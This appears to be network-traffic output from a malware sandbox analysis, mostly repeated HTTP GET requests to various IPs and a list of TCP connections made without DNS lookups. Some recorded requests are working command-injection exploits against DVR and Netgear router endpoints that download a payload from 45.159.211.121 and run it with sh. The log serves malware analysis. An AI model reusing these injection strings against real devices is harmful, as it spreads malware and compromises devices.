Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.189.15.13Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 88.119.171.57Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 88.119.171.57Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 88.119.171.57Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 88.119.171.57Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 89.111.167.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 89.111.167.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 89.111.167.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 89.111.167.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 89.111.167.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 89.111.167.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 89.111.167.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.189.114.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.82.185Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.23.51.100Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 25.202.8.64
Source: unknown TCP traffic detected without corresponding DNS query: 144.72.202.64
Source: unknown TCP traffic detected without corresponding DNS query: 154.75.22.196
Source: unknown TCP traffic detected without corresponding DNS query: 24.242.68.178
Source: unknown TCP traffic detected without corresponding DNS query: 200.124.252.70
Source: unknown TCP traffic detected without corresponding DNS query: 150.238.78.66
Source: unknown TCP traffic detected without corresponding DNS query: 146.34.108.61
Source: unknown TCP traffic detected without corresponding DNS query: 82.47.157.142
Source: unknown TCP traffic detected without corresponding DNS query: 131.209.64.199
Source: unknown TCP traffic detected without corresponding DNS query: 31.116.242.235
Source: unknown TCP traffic detected without corresponding DNS query: 141.169.91.13
Source: unknown TCP traffic detected without corresponding DNS query: 83.121.117.240
Source: unknown TCP traffic detected without corresponding DNS query: 1.167.117.94
Source: unknown TCP traffic detected without corresponding DNS query: 89.209.182.52
Source: unknown TCP traffic detected without corresponding DNS query: 121.58.73.182
Source: unknown TCP traffic detected without corresponding DNS query: 140.29.150.43
Source: unknown TCP traffic detected without corresponding DNS query: 145.207.19.114
Source: unknown TCP traffic detected without corresponding DNS query: 49.88.150.11
Source: unknown TCP traffic detected without corresponding DNS query: 14.4.51.76
Source: unknown TCP traffic detected without corresponding DNS query: 120.2.50.152
Source: unknown TCP traffic detected without corresponding DNS query: 197.140.119.185
Source: unknown TCP traffic detected without corresponding DNS query: 88.184.239.220
Source: unknown TCP traffic detected without corresponding DNS query: 101.204.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 45.223.25.222
Source: unknown TCP traffic detected without corresponding DNS query: 69.18.92.51
Source: unknown TCP traffic detected without corresponding DNS query: 198.112.111.37
Source: unknown TCP traffic detected without corresponding DNS query: 43.230.233.71
Source: unknown TCP traffic detected without corresponding DNS query: 32.107.163.57
Source: unknown TCP traffic detected without corresponding DNS query: 135.246.42.171
Source: unknown TCP traffic detected without corresponding DNS query: 111.156.153.195
Source: unknown TCP traffic detected without corresponding DNS query: 82.247.85.72
Source: unknown TCP traffic detected without corresponding DNS query: 84.160.184.203
Source: unknown TCP traffic detected without corresponding DNS query: 113.74.3.196
Source: unknown TCP traffic detected without corresponding DNS query: 80.32.94.104
Source: unknown TCP traffic detected without corresponding DNS query: 82.92.157.62
Source: unknown TCP traffic detected without corresponding DNS query: 78.121.198.30
Source: unknown TCP traffic detected without corresponding DNS query: 114.48.53.3
Source: unknown TCP traffic detected without corresponding DNS query: 165.136.108.240
Source: unknown TCP traffic detected without corresponding DNS query: 91.170.223.121
Source: unknown TCP traffic detected without corresponding DNS query: 182.176.106.180
Source: unknown TCP traffic detected without corresponding DNS query: 183.96.0.129
Source: unknown TCP traffic detected without corresponding DNS query: 132.91.20.176
Source: unknown TCP traffic detected without corresponding DNS query: 151.168.203.51
Source: unknown TCP traffic detected without corresponding DNS query: 9.122.14.24
Source: unknown TCP traffic detected without corresponding DNS query: 41.93.105.162
Source: unknown TCP traffic detected without corresponding DNS query: 88.208.124.218
Source: unknown TCP traffic detected without corresponding DNS query: 79.1.198.59
Source: unknown TCP traffic detected without corresponding DNS query: 171.145.103.255
Source: unknown TCP traffic detected without corresponding DNS query: 200.143.53.181
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.71.215
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.15Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.16Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.15Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.16Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.15Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.16Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.15Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.16Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.15Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.16Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.15Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.16Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.18Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.18Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.18Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.18Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.18Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.18Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.23Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.23Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.23Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.23Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.23Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.23Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.57Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.57Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.57Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.57Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.57Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.57Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.56Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.56Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.56Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.56Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.56Connection: close
